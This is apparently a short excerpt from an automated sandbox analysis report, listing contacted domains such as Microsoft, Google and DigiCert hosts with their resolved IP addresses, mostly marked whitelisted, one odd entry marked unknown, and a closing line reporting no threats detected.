www.microsoft.com
  • 95.101.149.131
  • 23.35.229.160
whitelisted
google.com
  • 142.250.185.78
whitelisted
6777.6777.6777.677e
unknown
watson.events.data.microsoft.com
  • 20.189.173.20
whitelisted
login.live.com
  • 20.190.159.2
  • 20.190.159.0
  • 40.126.31.71
  • 40.126.31.67
  • 20.190.159.4
  • 20.190.159.23
  • 20.190.159.73
  • 20.190.159.64
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
client.wns.windows.com
  • 40.113.103.199
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted

Threats

No threats detected
No debug info